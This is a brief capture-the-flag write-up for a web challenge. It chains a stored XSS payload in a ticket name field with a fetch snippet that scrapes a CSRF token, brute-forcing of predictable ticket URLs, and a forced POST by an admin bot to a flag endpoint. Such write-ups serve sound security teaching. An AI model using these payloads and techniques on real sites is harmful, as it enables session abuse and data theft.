# it-support >category: web >solves: 16 ## Recon We have a web-application to create ticket, we can give name and content.Every ticket has a unique url(not so random :/ ). After we create a ticket it will be updated after a few seconds. We can assume that some bot is visiting out note. So our goal is to somehow get data from that bot to get the flag ## xss We can get xss in the name parameter when creating the ticket using the below payload `"><img src=# onerror=alert()>` ## Data exfiltration Though we have xss we cannot get data from admin bot directly, Because as it says in the description we the bot has no external access.Meaning we can't get a ping back from the bot with the data we want CSRF to resuce using xss we can create a ticket with the data we want as content. - As the token is in the respone body ,we can get the `_tocken` using fetch > fetch('/').then(r=>r.text()).then(r=> {console.log(r.split('_token" value="')[1].slice(0,40))}) - To get that ticket created by csrf ,we can Observe the ticket url > /TK-{date}{time}-{random_number} > date is the excat date,we can get the time from update time > random_number range is 1000-2000 , we can brutefroce it ## Getting Flag - From the referer of admin bot , we can get `http://127.0.0.1:1234/admin-secret-ticket-asdtf5342ewadsfdxe3d` url - visiting that enpoint will give admin's ticket url `http://34.89.146.147:30233/ticket-admin-324d2s/TK-20220212060011-1968` - visiting that ,we can see a hidden form with POST requesting to flag endpoint `/get-your-flag` - in the admin bot,sending a post request to that enpoint with token and comment , and we will create a ticket on the admin side with the flag